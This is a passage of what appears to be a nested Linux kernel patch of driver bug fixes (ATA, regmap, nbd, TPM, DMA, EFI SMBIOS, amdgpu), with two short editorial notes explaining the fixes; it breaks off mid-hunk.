+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 06a3d95ed8f9f..39e1ff9b686b9 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -2699,18 +2699,36 @@ static unsigned int atapi_xlat(struct ata_queued_cmd *qc)
+ 	return 0;
+ }
+ 
+-static struct ata_device *ata_find_dev(struct ata_port *ap, int devno)
++static struct ata_device *ata_find_dev(struct ata_port *ap, unsigned int devno)
+ {
+-	if (!sata_pmp_attached(ap)) {
+-		if (likely(devno >= 0 &&
+-			   devno < ata_link_max_devices(&ap->link)))
++	/*
++	 * For the non-PMP case, ata_link_max_devices() returns 1 (SATA case),
++	 * or 2 (IDE master + slave case). However, the former case includes
++	 * libsas hosted devices which are numbered per scsi host, leading
++	 * to devno potentially being larger than 0 but with each struct
++	 * ata_device having its own struct ata_port and struct ata_link.
++	 * To accommodate these, ignore devno and always use device number 0.
++	 */
++	if (likely(!sata_pmp_attached(ap))) {
++		int link_max_devices = ata_link_max_devices(&ap->link);
++
++		if (link_max_devices == 1)
++			return &ap->link.device[0];
++
++		if (devno < link_max_devices)
+ 			return &ap->link.device[devno];
+-	} else {
+-		if (likely(devno >= 0 &&
+-			   devno < ap->nr_pmp_links))
+-			return &ap->pmp_link[devno].device[0];
++
++		return NULL;
+ 	}
+ 
++	/*
++	 * For PMP-attached devices, the device number corresponds to C
++	 * (channel) of SCSI [H:C:I:L], indicating the port pmp link
++	 * for the device.
++	 */
++	if (devno < ap->nr_pmp_links)
++		return &ap->pmp_link[devno].device[0];
++
+ 	return NULL;
+ }
+ 
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index c440d1af197a4..26e13887aba46 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -280,6 +280,16 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ 				continue;/* skip if itself or no cacheinfo */
+ 			for (sib_index = 0; sib_index < cache_leaves(i); sib_index++) {
+ 				sib_leaf = per_cpu_cacheinfo_idx(i, sib_index);
++
++				/*
++				 * Comparing cache IDs only makes sense if the leaves
++				 * belong to the same cache level of same type. Skip
++				 * the check if level and type do not match.
++				 */
++				if (sib_leaf->level != this_leaf->level ||
++				    sib_leaf->type != this_leaf->type)
++					continue;
++
+ 				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+ 					cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
+ 					cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
+@@ -311,6 +321,16 @@ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ 
+ 			for (sib_index = 0; sib_index < cache_leaves(sibling); sib_index++) {
+ 				sib_leaf = per_cpu_cacheinfo_idx(sibling, sib_index);
++
++				/*
++				 * Comparing cache IDs only makes sense if the leaves
++				 * belong to the same cache level of same type. Skip
++				 * the check if level and type do not match.
++				 */
++				if (sib_leaf->level != this_leaf->level ||
++				    sib_leaf->type != this_leaf->type)
++					continue;
++
+ 				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+ 					cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
+ 					cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
+diff --git a/drivers/base/regmap/regmap.c b/drivers/base/regmap/regmap.c
+index 7de1f27d0323d..8359164bff903 100644
+--- a/drivers/base/regmap/regmap.c
++++ b/drivers/base/regmap/regmap.c
+@@ -2064,6 +2064,8 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 	size_t val_count = val_len / val_bytes;
+ 	size_t chunk_count, chunk_bytes;
+ 	size_t chunk_regs = val_count;
++	size_t max_data = map->max_raw_write - map->format.reg_bytes -
++			map->format.pad_bytes;
+ 	int ret, i;
+ 
+ 	if (!val_count)
+@@ -2071,8 +2073,8 @@ int _regmap_raw_write(struct regmap *map, unsigned int reg,
+ 
+ 	if (map->use_single_write)
+ 		chunk_regs = 1;
+-	else if (map->max_raw_write && val_len > map->max_raw_write)
+-		chunk_regs = map->max_raw_write / val_bytes;
++	else if (map->max_raw_write && val_len > max_data)
++		chunk_regs = max_data / val_bytes;
+ 
+ 	chunk_count = val_count / chunk_regs;
+ 	chunk_bytes = chunk_regs * val_bytes;
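
[Editorial note, not part of the patch above.] The arithmetic fix is easy to miss: map->max_raw_write caps the whole bus transfer, including the register address and padding that _regmap_raw_write() prepends, so the per-chunk register count must come from the data budget, not from the raw limit. A worked example with hypothetical numbers:

	/* max_raw_write = 32, format.reg_bytes = 2, format.pad_bytes = 0,
	 * val_bytes = 2:
	 *   max_data   = 32 - 2 - 0 = 30
	 *   chunk_regs = 30 / 2     = 15 registers per write
	 * The old code computed 32 / 2 = 16 registers, i.e. 32 data
	 * bytes plus the 2-byte register header = 34 bytes on the wire,
	 * overrunning the 32-byte transport limit.
	 */
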
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 888a6abb50f53..7718c81e1dba8 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -1665,7 +1665,7 @@ static int nbd_dev_dbg_init(struct nbd_device *nbd)
+ 		return -EIO;
+ 
+ 	dir = debugfs_create_dir(nbd_name(nbd), nbd_dbg_dir);
+-	if (!dir) {
++	if (IS_ERR(dir)) {
+ 		dev_err(nbd_to_dev(nbd), "Failed to create debugfs dir for '%s'\n",
+ 			nbd_name(nbd));
+ 		return -EIO;
+@@ -1691,7 +1691,7 @@ static int nbd_dbg_init(void)
+ 	struct dentry *dbg_dir;
+ 
+ 	dbg_dir = debugfs_create_dir("nbd", NULL);
+-	if (!dbg_dir)
++	if (IS_ERR(dbg_dir))
+ 		return -EIO;
+ 
+ 	nbd_dbg_dir = dbg_dir;
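
[Editorial note, not part of the patch above.] The nbd fix corrects a common debugfs pitfall: debugfs_create_dir() never returns NULL; it reports failure as an ERR_PTR (including ERR_PTR(-ENODEV) when CONFIG_DEBUG_FS is off), so a !dir test can never fire. A hedged sketch of the right check, with a hypothetical directory name:

	struct dentry *dir;

	dir = debugfs_create_dir("mydev", NULL);
	if (IS_ERR(dir))
		return PTR_ERR(dir);	/* e.g. -ENODEV without debugfs */
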
+diff --git a/drivers/block/rnbd/rnbd-proto.h b/drivers/block/rnbd/rnbd-proto.h
+index ea7ac8bca63cf..da1d0542d7e2c 100644
+--- a/drivers/block/rnbd/rnbd-proto.h
++++ b/drivers/block/rnbd/rnbd-proto.h
+@@ -241,7 +241,7 @@ static inline blk_opf_t rnbd_to_bio_flags(u32 rnbd_opf)
+ 		bio_opf = REQ_OP_WRITE;
+ 		break;
+ 	case RNBD_OP_FLUSH:
+-		bio_opf = REQ_OP_FLUSH | REQ_PREFLUSH;
++		bio_opf = REQ_OP_WRITE | REQ_PREFLUSH;
+ 		break;
+ 	case RNBD_OP_DISCARD:
+ 		bio_opf = REQ_OP_DISCARD;
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index c0cbc5f3eb266..c56d1c6d8e58d 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1045,6 +1045,11 @@ static inline bool ublk_queue_ready(struct ublk_queue *ubq)
+ 	return ubq->nr_io_ready == ubq->q_depth;
+ }
+ 
++static void ublk_cmd_cancel_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
++{
++	io_uring_cmd_done(cmd, UBLK_IO_RES_ABORT, 0, issue_flags);
++}
++
+ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ {
+ 	int i;
+@@ -1056,8 +1061,8 @@ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+ 		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0,
+-						IO_URING_F_UNLOCKED);
++			io_uring_cmd_complete_in_task(io->cmd,
++						      ublk_cmd_cancel_cb);
+ 	}
+ 
+ 	/* all io commands are canceled */
+diff --git a/drivers/char/tpm/tpm_tis_core.c b/drivers/char/tpm/tpm_tis_core.c
+index f02b583005a53..e05d2b227de37 100644
+--- a/drivers/char/tpm/tpm_tis_core.c
++++ b/drivers/char/tpm/tpm_tis_core.c
+@@ -805,8 +805,11 @@ static int tpm_tis_probe_irq_single(struct tpm_chip *chip, u32 intmask,
+ 	int rc;
+ 	u32 int_status;
+ 
+-	if (devm_request_irq(chip->dev.parent, irq, tis_int_handler, flags,
+-			     dev_name(&chip->dev), chip) != 0) {
++
++	rc = devm_request_threaded_irq(chip->dev.parent, irq, NULL,
++				       tis_int_handler, IRQF_ONESHOT | flags,
++				       dev_name(&chip->dev), chip);
++	if (rc) {
+ 		dev_info(&chip->dev, "Unable to request irq: %d for probe\n",
+ 			 irq);
+ 		return -1;
+diff --git a/drivers/char/tpm/tpm_tis_core.h b/drivers/char/tpm/tpm_tis_core.h
+index e978f457fd4d4..610bfadb6acf1 100644
+--- a/drivers/char/tpm/tpm_tis_core.h
++++ b/drivers/char/tpm/tpm_tis_core.h
+@@ -84,10 +84,10 @@ enum tis_defaults {
+ #define ILB_REMAP_SIZE			0x100
+ 
+ enum tpm_tis_flags {
+-	TPM_TIS_ITPM_WORKAROUND		= BIT(0),
+-	TPM_TIS_INVALID_STATUS		= BIT(1),
+-	TPM_TIS_DEFAULT_CANCELLATION	= BIT(2),
+-	TPM_TIS_IRQ_TESTED		= BIT(3),
++	TPM_TIS_ITPM_WORKAROUND		= 0,
++	TPM_TIS_INVALID_STATUS		= 1,
++	TPM_TIS_DEFAULT_CANCELLATION	= 2,
++	TPM_TIS_IRQ_TESTED		= 3,
+ };
+ 
+ struct tpm_tis_data {
+diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c
+index bfc8ae2143957..7919906b02e74 100644
+--- a/drivers/dma/at_xdmac.c
++++ b/drivers/dma/at_xdmac.c
+@@ -1026,6 +1026,8 @@ at_xdmac_prep_interleaved(struct dma_chan *chan,
+ 							NULL,
+ 							src_addr, dst_addr,
+ 							xt, xt->sgl);
++		if (!first)
++			return NULL;
+ 
+ 		/* Length of the block is (BLEN+1) microblocks. */
+ 		for (i = 0; i < xt->numf - 1; i++)
+@@ -1056,8 +1058,9 @@ at_xdmac_prep_interleaved(struct dma_chan *chan,
+ 							       src_addr, dst_addr,
+ 							       xt, chunk);
+ 			if (!desc) {
+-				list_splice_tail_init(&first->descs_list,
+-						      &atchan->free_descs_list);
++				if (first)
++					list_splice_tail_init(&first->descs_list,
++							      &atchan->free_descs_list);
+ 				return NULL;
+ 			}
+ 
+diff --git a/drivers/dma/pl330.c b/drivers/dma/pl330.c
+index 0d9257fbdfb0d..b4731fe6bbc14 100644
+--- a/drivers/dma/pl330.c
++++ b/drivers/dma/pl330.c
+@@ -1050,7 +1050,7 @@ static bool _trigger(struct pl330_thread *thrd)
+ 	return true;
+ }
+ 
+-static bool _start(struct pl330_thread *thrd)
++static bool pl330_start_thread(struct pl330_thread *thrd)
+ {
+ 	switch (_state(thrd)) {
+ 	case PL330_STATE_FAULT_COMPLETING:
+@@ -1702,7 +1702,7 @@ static int pl330_update(struct pl330_dmac *pl330)
+ 			thrd->req_running = -1;
+ 
+ 			/* Get going again ASAP */
+-			_start(thrd);
++			pl330_start_thread(thrd);
+ 
+ 			/* For now, just make a list of callbacks to be done */
+ 			list_add_tail(&descdone->rqd, &pl330->req_done);
+@@ -2089,7 +2089,7 @@ static void pl330_tasklet(struct tasklet_struct *t)
+ 	} else {
+ 		/* Make sure the PL330 Channel thread is active */
+ 		spin_lock(&pch->thread->dmac->lock);
+-		_start(pch->thread);
++		pl330_start_thread(pch->thread);
+ 		spin_unlock(&pch->thread->dmac->lock);
+ 	}
+ 
+@@ -2107,7 +2107,7 @@ static void pl330_tasklet(struct tasklet_struct *t)
+ 			if (power_down) {
+ 				pch->active = true;
+ 				spin_lock(&pch->thread->dmac->lock);
+-				_start(pch->thread);
++				pl330_start_thread(pch->thread);
+ 				spin_unlock(&pch->thread->dmac->lock);
+ 				power_down = false;
+ 			}
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index 42282c5c3fe6a..e2f90566b291a 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -17,20 +17,43 @@
+ 
+ static bool system_needs_vamap(void)
+ {
+-	const u8 *type1_family = efi_get_smbios_string(1, family);
++	const struct efi_smbios_type4_record *record;
++	const u32 __aligned(1) *socid;
++	const u8 *version;
+ 
+ 	/*
+ 	 * Ampere eMAG, Altra, and Altra Max machines crash in SetTime() if
+-	 * SetVirtualAddressMap() has not been called prior.
++	 * SetVirtualAddressMap() has not been called prior. Most Altra systems
++	 * can be identified by the SMCCC soc ID, which is conveniently exposed
++	 * via the type 4 SMBIOS records. Otherwise, test the processor version
++	 * field. eMAG systems all appear to have the processor version field
++	 * set to "eMAG".
+ 	 */
+-	if (!type1_family || (
+-	    strcmp(type1_family, "eMAG") &&
+-	    strcmp(type1_family, "Altra") &&
+-	    strcmp(type1_family, "Altra Max")))
++	record = (struct efi_smbios_type4_record *)efi_get_smbios_record(4);
++	if (!record)
+ 		return false;
+ 
+-	efi_warn("Working around broken SetVirtualAddressMap()\n");
+-	return true;
++	socid = (u32 *)record->processor_id;
++	switch (*socid & 0xffff000f) {
++		static char const altra[] = "Ampere(TM) Altra(TM) Processor";
++		static char const emag[] = "eMAG";
++
++	default:
++		version = efi_get_smbios_string(&record->header, 4,
++						processor_version);
++		if (!version || (strncmp(version, altra, sizeof(altra) - 1) &&
++				 strncmp(version, emag, sizeof(emag) - 1)))
++			break;
++
++		fallthrough;
++
++	case 0x0a160001:	// Altra
++	case 0x0a160002:	// Altra Max
++		efi_warn("Working around broken SetVirtualAddressMap()\n");
++		return true;
++	}
++
++	return false;
+ }
+ 
+ efi_status_t check_platform_features(void)
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index 900df67a20785..970e86e3aab05 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -983,6 +983,8 @@ struct efi_smbios_record {
+ 	u16	handle;
+ };
+ 
++const struct efi_smbios_record *efi_get_smbios_record(u8 type);
++
+ struct efi_smbios_type1_record {
+ 	struct efi_smbios_record	header;
+ 
+@@ -996,13 +998,46 @@ struct efi_smbios_type1_record {
+ 	u8				family;
+ };
+ 
+-#define efi_get_smbios_string(__type, __name) ({			\
++struct efi_smbios_type4_record {
++	struct efi_smbios_record	header;
++
++	u8				socket;
++	u8				processor_type;
++	u8				processor_family;
++	u8				processor_manufacturer;
++	u8				processor_id[8];
++	u8				processor_version;
++	u8				voltage;
++	u16				external_clock;
++	u16				max_speed;
++	u16				current_speed;
++	u8				status;
++	u8				processor_upgrade;
++	u16				l1_cache_handle;
++	u16				l2_cache_handle;
++	u16				l3_cache_handle;
++	u8				serial_number;
++	u8				asset_tag;
++	u8				part_number;
++	u8				core_count;
++	u8				enabled_core_count;
++	u8				thread_count;
++	u16				processor_characteristics;
++	u16				processor_family2;
++	u16				core_count2;
++	u16				enabled_core_count2;
++	u16				thread_count2;
++	u16				thread_enabled;
++};
++
++#define efi_get_smbios_string(__record, __type, __name) ({		\
+ 	int size = sizeof(struct efi_smbios_type ## __type ## _record);	\
+ 	int off = offsetof(struct efi_smbios_type ## __type ## _record,	\
+ 			   __name);					\
+-	__efi_get_smbios_string(__type, off, size);			\
++	__efi_get_smbios_string((__record), __type, off, size);		\
+ })
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize);
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize);
+ 
+ #endif
+diff --git a/drivers/firmware/efi/libstub/smbios.c b/drivers/firmware/efi/libstub/smbios.c
+index aadb422b9637d..f9c159c28f461 100644
+--- a/drivers/firmware/efi/libstub/smbios.c
++++ b/drivers/firmware/efi/libstub/smbios.c
+@@ -22,19 +22,28 @@ struct efi_smbios_protocol {
+ 	u8 minor_version;
+ };
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize)
++const struct efi_smbios_record *efi_get_smbios_record(u8 type)
+ {
+ 	struct efi_smbios_record *record;
+ 	efi_smbios_protocol_t *smbios;
+ 	efi_status_t status;
+ 	u16 handle = 0xfffe;
+-	const u8 *strtable;
+ 
+ 	status = efi_bs_call(locate_protocol, &EFI_SMBIOS_PROTOCOL_GUID, NULL,
+ 			     (void **)&smbios) ?:
+ 		 efi_call_proto(smbios, get_next, &handle, &type, &record, NULL);
+ 	if (status != EFI_SUCCESS)
+ 		return NULL;
++	return record;
++}
++
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize)
++{
++	const u8 *strtable;
++
++	if (!record)
++		return NULL;
+ 
+ 	strtable = (u8 *)record + record->length;
+ 	for (int i = 1; i < ((u8 *)record)[offset]; i++) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 011e4fbe27f10..ef0a94c70859b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -2512,8 +2512,6 @@ static int amdgpu_device_ip_init(struct amdgpu_device *adev)
+ 	amdgpu_fru_get_product_info(adev);
+ 
+ init_failed:
+-	if (amdgpu_sriov_vf(adev))
+-		amdgpu_virt_release_full_gpu(adev, true);
+ 
+ 	return r;
+ }
+@@ -3557,6 +3555,7 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 	int r, i;
+ 	bool px = false;
+ 	u32 max_MBps;
++	int tmp;
+ 
+ 	adev->shutdown = false;
+ 	adev->flags = flags;
+@@ -3735,6 +3734,12 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 		adev->have_atomics_support = ((struct amd_sriov_msg_pf2vf_info *)
+ 			adev->virt.fw_reserve.p_pf2vf)->pcie_atomic_ops_support_flags ==
+ 			(PCI_EXP_DEVCAP2_ATOMIC_COMP32 | PCI_EXP_DEVCAP2_ATOMIC_COMP64);
++	/* APUs w/ gfx9 onwards don't rely on PCIe atomics; rather, an
++	 * internal path natively supports atomics, so set have_atomics_support to true.
++	 */
++	else if ((adev->flags & AMD_IS_APU) &&
++		(adev->ip_versions[GC_HWIP][0] > IP_VERSION(9, 0, 0)))
++		adev->have_atomics_support = true;
+ 	else
+ 		adev->have_atomics_support =
+ 			!pci_enable_atomic_ops_to_root(adev->pdev,
+@@ -3778,7 +3783,13 @@ int amdgpu_device_init(struct amdgpu_device *adev,
+ 				}
+ 			}
+ 		} else {
++			tmp = amdgpu_reset_method;
++			/* It should do a default reset when loading or reloading the driver,
++			 * regardless of the module parameter reset_method.
++			 */
++			amdgpu_reset_method = AMD_RESET_METHOD_NONE;
+ 			r = amdgpu_asic_reset(adev);
++			amdgpu_reset_method = tmp;
+ 			if (r) {
+ 				dev_err(adev->dev, "asic reset on init failed\n");
+ 				goto failed;
+@@ -3838,18 +3849,6 @@ fence_driver_init:
+ 
+ 	r = amdgpu_device_ip_init(adev);
+ 	if (r) {
+-		/* failed in exclusive mode due to timeout */
+-		if (amdgpu_sriov_vf(adev) &&
+-		    !amdgpu_sriov_runtime(adev) &&
+-		    amdgpu_virt_mmio_blocked(adev) &&
+-		    !amdgpu_virt_wait_reset(adev)) {
+-			dev_err(adev->dev, "VF exclusive mode timeout\n");
+-			/* Don't send request since VF is inactive. */
+-			adev->virt.caps &= ~AMDGPU_SRIOV_CAPS_RUNTIME;
+-			adev->virt.ops = NULL;
+-			r = -EAGAIN;
+-			goto release_ras_con;
+-		}
+ 		dev_err(adev->dev, "amdgpu_device_ip_init failed\n");
+ 		amdgpu_vf_error_put(adev, AMDGIM_ERROR_VF_AMDGPU_INIT_FAIL, 0, 0);
+ 		goto release_ras_con;
+@@ -3921,8 +3920,10 @@ fence_driver_init:
+ 				   msecs_to_jiffies(AMDGPU_RESUME_MS));
+ 	}
+ 
+-	if (amdgpu_sriov_vf(adev))
++	if (amdgpu_sriov_vf(adev)) {
++		amdgpu_virt_release_full_gpu(adev, true);
+ 		flush_delayed_work(&adev->delayed_init_work);
++	}
+ 
+ 	r = sysfs_create_files(&adev->dev->kobj, amdgpu_dev_attributes);
+ 	if (r)
+@@ -3962,6 +3963,20 @@ fence_driver_init:
+ 	return 0;
+ 
+ release_ras_con:
++	if (amdgpu_sriov_vf(adev))
++		amdgpu_virt_release_full_gpu(adev, true);
++
++	/* failed in exclusive mode due to timeout */
++	if (amdgpu_sriov_vf(adev) &&
++		!amdgpu_sriov_runtime(adev) &&
++		amdgpu_virt_mmio_blocked(adev) &&
++		!amdgpu_virt_wait_reset(adev)) {
++		dev_err(adev->dev, "VF exclusive mode timeout\n");
++		/* Don't send request since VF is inactive. */
++		adev->virt.caps &= ~AMDGPU_SRIOV_CAPS_RUNTIME;
++		adev->virt.ops = NULL;
++		r = -EAGAIN;
++	}
+ 	amdgpu_release_ras_context(adev);
+ 
+ failed:
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+index 3cc1929285fc0..ed6878d5b3ce3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_fence.c
+@@ -528,7 +528,8 @@ void amdgpu_fence_driver_hw_fini(struct amdgpu_device *adev)
+ 		if (r)
+ 			amdgpu_fence_driver_force_completion(ring);
+ 
+-		if (ring->fence_drv.irq_src)
++		if (!drm_dev_is_unplugged(adev_to_drm(adev)) &&
++		    ring->fence_drv.irq_src)
+ 			amdgpu_irq_put(adev, ring->fence_drv.irq_src,
+ 				       ring->fence_drv.irq_type);
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+index 02a4c93673ce2..2bc791ed8830a 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gmc.c
+@@ -526,6 +526,8 @@ void amdgpu_gmc_tmz_set(struct amdgpu_device *adev)
+ 	case IP_VERSION(9, 3, 0):
+ 	/* GC 10.3.7 */
+ 	case IP_VERSION(10, 3, 7):
++	/* GC 11.0.1 */
++	case IP_VERSION(11, 0, 1):
+ 		if (amdgpu_tmz == 0) {
+ 			adev->gmc.tmz_enabled = false;
+ 			dev_info(adev->dev,
+@@ -548,7 +550,6 @@ void amdgpu_gmc_tmz_set(struct amdgpu_device *adev)
+ 	case IP_VERSION(10, 3, 1):
+ 	/* YELLOW_CARP*/
+ 	case IP_VERSION(10, 3, 3):
+-	case IP_VERSION(11, 0, 1):
+ 	case IP_VERSION(11, 0, 4):
+ 		/* Don't enable it by default yet.
+ 		 */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index b46732cefe37c..8ab0dd799b3cb 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2763,7 +2763,7 @@ static int dm_resume(void *handle)
+ 		 * this is the case when traversing through already created
+ 		 * MST connectors, should be skipped
+ 		 */
+-		if (aconnector->dc_link->type == dc_connection_mst_branch)
++		if (aconnector && aconnector->mst_port)
+ 			continue;
+ 
+ 		mutex_lock(&aconnector->hpd_lock);
+@@ -6492,7 +6492,7 @@ static int dm_encoder_helper_atomic_check(struct drm_encoder *encoder,
+ 	int clock, bpp = 0;
+ 	bool is_y420 = false;
+ 
+-	if (!aconnector->port || !aconnector->dc_sink)
++	if (!aconnector->port)
+ 		return 0;
+ 
+ 	mst_port = aconnector->port;
+diff --git a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+index 49c398ec0aaf6..c89cfef7cafa1 100644
+--- a/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
++++ b/drivers/gpu/drm/amd/pm/legacy-dpm/si_dpm.c
+@@ -6925,23 +6925,6 @@ static int si_dpm_enable(struct amdgpu_device *adev)
+ 	return 0;
+ }
+ 
+-static int si_set_temperature_range(struct amdgpu_device *adev)
+-{
+-	int ret;
+-
+-	ret = si_thermal_enable_alert(adev, false);
+-	if (ret)
+-		return ret;
+-	ret = si_thermal_set_temperature_range(adev, R600_TEMP_RANGE_MIN, R600_TEMP_RANGE_MAX);
+-	if (ret)
+-		return ret;
+-	ret = si_thermal_enable_alert(adev, true);
+-	if (ret)
+-		return ret;
+-
+-	return ret;
+-}
+-
+ static void si_dpm_disable(struct amdgpu_device *adev)
+ {
+ 	struct rv7xx_power_info *pi = rv770_get_pi(adev);
+@@ -7626,18 +7609,6 @@ static int si_dpm_process_interrupt(struct amdgpu_device *adev,
+ 
+ static int si_dpm_late_init(void *handle)
+ {
+-	int ret;
+-	struct amdgpu_device *adev = (struct amdgpu_device *)handle;
+-
+-	if (!adev->pm.dpm_enabled)
+-		return 0;
+-
+-	ret = si_set_temperature_range(adev);
+-	if (ret)
+-		return ret;
+-#if 0 //TODO ?
+-	si_dpm_powergate_uvd(adev, true);
+-#endif
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+index cb10c7e312646..1b731a9c92d93 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+@@ -580,7 +580,7 @@ static int vangogh_print_legacy_clk_levels(struct smu_context *smu,
+ 	DpmClocks_t *clk_table = smu->smu_table.clocks_table;
+ 	SmuMetrics_legacy_t metrics;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	bool cur_value_match_level = false;
+ 
+@@ -654,7 +654,8 @@ static int vangogh_print_legacy_clk_levels(struct smu_context *smu,
+ 	case SMU_MCLK:
+ 	case SMU_FCLK:
+ 		for (i = 0; i < count; i++) {
+-			ret = vangogh_get_dpm_clk_limited(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = vangogh_get_dpm_clk_limited(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				return ret;
+ 			if (!value)
+@@ -681,7 +682,7 @@ static int vangogh_print_clk_levels(struct smu_context *smu,
+ 	DpmClocks_t *clk_table = smu->smu_table.clocks_table;
+ 	SmuMetrics_t metrics;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0;
+ 	bool cur_value_match_level = false;
+ 	uint32_t min, max;
+@@ -763,7 +764,8 @@ static int vangogh_print_clk_levels(struct smu_context *smu,
+ 	case SMU_MCLK:
+ 	case SMU_FCLK:
+ 		for (i = 0; i < count; i++) {
+-			ret = vangogh_get_dpm_clk_limited(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = vangogh_get_dpm_clk_limited(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				return ret;
+ 			if (!value)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+index 5cdc07165480b..8a8ba25c9ad7c 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu12/renoir_ppt.c
+@@ -494,7 +494,7 @@ static int renoir_set_fine_grain_gfx_freq_parameters(struct smu_context *smu)
+ static int renoir_print_clk_levels(struct smu_context *smu,
+ 			enum smu_clk_type clk_type, char *buf)
+ {
+-	int i, size = 0, ret = 0;
++	int i, idx, size = 0, ret = 0;
+ 	uint32_t cur_value = 0, value = 0, count = 0, min = 0, max = 0;
+ 	SmuMetrics_t metrics;
+ 	struct smu_dpm_context *smu_dpm_ctx = &(smu->smu_dpm);
+@@ -594,7 +594,8 @@ static int renoir_print_clk_levels(struct smu_context *smu,
+ 	case SMU_VCLK:
+ 	case SMU_DCLK:
+ 		for (i = 0; i < count; i++) {
+-			ret = renoir_get_dpm_clk_limited(smu, clk_type, i, &value);
++			idx = (clk_type == SMU_FCLK || clk_type == SMU_MCLK) ? (count - i - 1) : i;
++			ret = renoir_get_dpm_clk_limited(smu, clk_type, idx, &value);
+ 			if (ret)
+ 				return ret;
+ 			if (!value)
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+index 8fa9a36c38b64..6d9760eac16d8 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0_4_ppt.c
+@@ -478,7 +478,7 @@ static int smu_v13_0_4_get_dpm_level_count(struct smu_context *smu,
